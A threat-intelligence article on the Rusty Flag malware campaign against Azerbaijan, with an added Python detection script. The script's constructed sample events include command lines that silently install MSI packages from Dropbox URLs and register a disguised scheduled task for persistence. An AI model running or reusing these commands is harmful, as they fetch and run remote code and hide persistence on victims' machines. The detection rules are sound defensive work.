Azerbaijan targeted by the new Rusty Flag malware campaign

September 22, 2023

Azerbaijan has become the target of a newly discovered malware campaign, Operation Rusty Flag, built around a Rust-based implant that compromises targeted systems. The campaign has so far shown no evidence of affiliation with any known threat actor or group, which makes attribution difficult and the threat harder to scope.

Moreover, it employs at least two distinct initial access methods. One of them reuses a modified document previously employed by the Storm-0978 group, which may be a deliberate attempt by the operators to mislead investigators into attributing the campaign to Storm-0978.

The first chain starts with an LNK file named “1.KARABAKH.jpg.lnk”, a loader that retrieves a second-stage payload: an MSI installer hosted on Dropbox. The installer drops a Rust-based implant, an XML file defining a scheduled task that runs the implant, and a decoy image watermarked with the symbol of the Azerbaijan Ministry of Defense.

The Operation Rusty Flag operators also use a second infection vector: a Microsoft Office document named “Overview_of_UWCs_UkraineInNATO_campaign.docx”. This document exploits a six-year-old memory corruption flaw in Microsoft Office’s Equation Editor (CVE-2017-11882). The exploit fetches a different MSI file from a Dropbox URL, and that installer delivers a variant of the same Rust-based backdoor.

The reuse of the “Overview_of_UWCs_UkraineInNATO_campaign.docx” lure suggests a link to Storm-0978, which previously used the same document in cyberattacks against Ukraine; in that campaign the document exploited a different Office remote code execution bug (CVE-2023-36884). However, the operators may have reused the Storm-0978 lure deliberately, as a false flag to shift blame onto that group.
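Both infection chains described above (LNK to msiexec fetching an MSI from Dropbox, then a scheduled task for persistence; Equation Editor exploit to msiexec fetching a second MSI from Dropbox) leave the same footprints in process-creation telemetry. The script below is an added example written for this page, not code from the article or from the campaign’s analysts. It runs three detection rules over a handful of constructed Sysmon-style process-creation events (the paths, task name and Dropbox URLs are made up) and flags the double-extension LNK trick. The rule names, field names and the assumption that Equation Editor never legitimately spawns a child process are the author’s own.

```python
"""Detection logic for the Rusty Flag infection chains, run over constructed sample events.

Added example. The events below are made up to illustrate the behaviours the article
describes; field names follow Sysmon Event ID 1 (process creation), but any EDR telemetry
that records parent image, image and command line can be mapped onto them.
"""
import ntpath
import re

# Constructed sample process-creation events; not real telemetry from the campaign.
SAMPLE_EVENTS = [
    # Vector 1: the user opens the disguised LNK; Explorer runs msiexec against a Dropbox URL.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i https://www.dropbox.com/s/abc123/update.msi /qn"},
    # The MSI registers persistence from the task XML it dropped (task name is assumed).
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks.exe /Create /TN WinDefenderHealth /XML C:\Users\Public\task.xml"},
    # Vector 2: Equation Editor (started via DCOM, so its own parent is svchost, not WINWORD)
    # is exploited and spawns msiexec with another Dropbox URL.
    {"parent": r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec /i https://dl.dropboxusercontent.com/s/xyz789/update.msi /q"},
    # Benign: an admin installs a package from a local path.
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"msiexec.exe /i C:\Users\alice\Downloads\7z2301-x64.msi"},
    # Benign: an admin imports a task definition by hand from a shell.
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r"schtasks /Create /TN Backup /XML C:\ops\backup.xml"},
]

DROPBOX_URL = re.compile(
    r"https?://(?:www\.)?(?:dropbox\.com|dl\.dropboxusercontent\.com)/\S+", re.I)

DISGUISE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt"}


def basename(path):
    """Lower-cased file name of a Windows path; ntpath handles backslashes on any host OS."""
    return ntpath.basename(path).lower()


def rules_for(event):
    """Return the names of the rules an event matches (empty list if none)."""
    hits = []
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    # Both vectors stage their installer on Dropbox and hand the URL straight to msiexec.
    if image == "msiexec.exe" and DROPBOX_URL.search(cmd):
        hits.append("msiexec_package_from_dropbox")
    # Assumption: Equation Editor has no reason to create child processes, so any child
    # is a strong sign of CVE-2017-11882-style exploitation.
    if parent == "eqnedt32.exe":
        hits.append("eqnedt32_spawned_child")
    # Importing a task from XML is routine admin work; it is suspicious when an installer does it.
    if (image == "schtasks.exe" and parent == "msiexec.exe"
            and re.search(r"/create\b", cmd, re.I) and re.search(r"/xml\b", cmd, re.I)):
        hits.append("schtasks_xml_from_installer")
    return hits


def is_disguised_lnk(filename):
    """True for shortcuts hiding behind an innocuous second extension, e.g. 1.KARABAKH.jpg.lnk."""
    name = filename.lower()
    if not name.endswith(".lnk"):
        return False
    return ntpath.splitext(name[:-len(".lnk")])[1] in DISGUISE_EXTENSIONS


def scan(events):
    """Pair each event index with every rule it triggers, in event order."""
    return [(i, rule) for i, e in enumerate(events) for rule in rules_for(e)]


if __name__ == "__main__":
    for i, rule in scan(SAMPLE_EVENTS):
        print(f"event {i}: {rule} :: {SAMPLE_EVENTS[i]['cmdline']}")
    print("disguised LNK:", is_disguised_lnk("1.KARABAKH.jpg.lnk"))
```

The two benign events show why the rules are scoped the way they are: msiexec installing from a local path and an admin importing a task XML from a shell produce no hits, while the installer-driven task import and the Dropbox-sourced MSI do. The Equation Editor rule fires on any child process, which is acceptable because the legitimate program never needs one; if your environment proves otherwise, narrow it to children that touch the network.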

Both Rust-based backdoor variants, including the one disguised as “WinDefenderHealth.exe”, can gather data from the infected host and exfiltrate it to an attacker-controlled server. The campaign’s primary objective remains unknown despite the ongoing investigation.

The growing number of malware authors adopting the Rust programming language is a concerning trend: Rust binaries are harder for many security products to detect and for analysts to reverse engineer, which complicates accurate detection and threat analysis and makes the threat landscape more hostile. Operation Rusty Flag is one more example of this evolving class of sophisticated, Rust-based threats.
